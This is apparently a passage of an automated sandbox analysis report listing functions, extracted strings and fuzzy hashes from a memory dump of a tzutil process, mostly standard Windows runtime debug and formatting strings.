                                                              • Associated: 00000008.00000002.3284206752.0000000002FAE000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_2e10000_tzutil.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                              • API String ID: 0-871070163
                                                              • Opcode ID: 98038fd45c9f058b246509bdba45089c1cdbf06d81a5e9d04bac5086dda5c4b3
                                                              • Instruction ID: 8365677ad7839e73daa24bf4e20d7beb543ecf38d67aae4217e37c9f95bd91ee
                                                              • Opcode Fuzzy Hash: 98038fd45c9f058b246509bdba45089c1cdbf06d81a5e9d04bac5086dda5c4b3
                                                              • Instruction Fuzzy Hash: CA41D1313847028BD728DE258C50B6BB7E6EF88B18F109A1DF95AD7680DB31E5058F91
                                                              APIs
                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 02EB728C
                                                              Strings
                                                              • RTL: Re-Waiting, xrefs: 02EB72C1
                                                              • RTL: Resource at %p, xrefs: 02EB72A3
                                                              • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 02EB7294
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.3284206752.0000000002E10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E10000, based on PE: true
                                                              • Associated: 00000008.00000002.3284206752.0000000002F39000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000008.00000002.3284206752.0000000002F3D000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000008.00000002.3284206752.0000000002FAE000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_2e10000_tzutil.jbxd
                                                              Similarity
                                                              • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                              • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                              • API String ID: 885266447-605551621
                                                              • Opcode ID: 2250c1456516ac989dadcb4762f3e9edb56d2b67d70c97b130beadeb394cfbe8
                                                              • Instruction ID: ca01135ba9fca7da47fb1f02765208c8377bc52405a2695547b92b1b51b46909
                                                              • Opcode Fuzzy Hash: 2250c1456516ac989dadcb4762f3e9edb56d2b67d70c97b130beadeb394cfbe8
                                                              • Instruction Fuzzy Hash: 0A411772A802029BD715DE24CC41BA6B7A6FF94718F10A61DFD59D7640E731E842CBD0
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.3284206752.0000000002E10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E10000, based on PE: true
                                                              • Associated: 00000008.00000002.3284206752.0000000002F39000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000008.00000002.3284206752.0000000002F3D000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000008.00000002.3284206752.0000000002FAE000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_2e10000_tzutil.jbxd
                                                              Similarity
                                                              • API ID: ___swprintf_l
                                                              • String ID: %%%u$]:%u
                                                              • API String ID: 48624451-3050659472
                                                              • Opcode ID: 5635d578e5d6364eb48e9dea2727d9b14e040fa27dc040adbee20c2859ab2fa5
                                                              • Instruction ID: f4c0fb08f9dceaba6a287ad6c3ad4ddb34d9a5984bf312cf16f19d8b328f0e07
                                                              • Opcode Fuzzy Hash: 5635d578e5d6364eb48e9dea2727d9b14e040fa27dc040adbee20c2859ab2fa5
                                                              • Instruction Fuzzy Hash: E8318872A415199FDB60DE28CC40BEE77B9EB44714F449596EE49D3140EB30DA448FA0
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.3284206752.0000000002E10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E10000, based on PE: true
                                                              • Associated: 00000008.00000002.3284206752.0000000002F39000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000008.00000002.3284206752.0000000002F3D000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000008.00000002.3284206752.0000000002FAE000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_2e10000_tzutil.jbxd
                                                              Similarity
                                                              • API ID: __aulldvrm
                                                              • String ID: +$-
                                                              • API String ID: 1302938615-2137968064
                                                              • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                              • Instruction ID: 413b8ed7667c710b45beae68909adc5ec5fa18d82a2f157f52785cdb7c8887b0
                                                              • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                              • Instruction Fuzzy Hash: 1B91B879E802199ADB24EE5AC8806BEF7A5AF45358F74E51AE8DDE72C0D7309940CB10
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.3284206752.0000000002E10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E10000, based on PE: true
                                                              • Associated: 00000008.00000002.3284206752.0000000002F39000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000008.00000002.3284206752.0000000002F3D000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000008.00000002.3284206752.0000000002FAE000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_2e10000_tzutil.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: $$@
                                                              • API String ID: 0-1194432280
                                                              • Opcode ID: adc0878f0c76e48b5c0863d64fc4866392a1adef1d34fe7db20b348977e07baf
                                                              • Instruction ID: 1b1e6a43b2eecb4507a92a82c41a2a726e9759501e28cec160bbb374165b980f
                                                              • Opcode Fuzzy Hash: adc0878f0c76e48b5c0863d64fc4866392a1adef1d34fe7db20b348977e07baf
                                                              • Instruction Fuzzy Hash: 1E814B71D402699BDB35DB54CC54BEEB7B9AF48754F0091EAEA09B7240D730AE80CFA0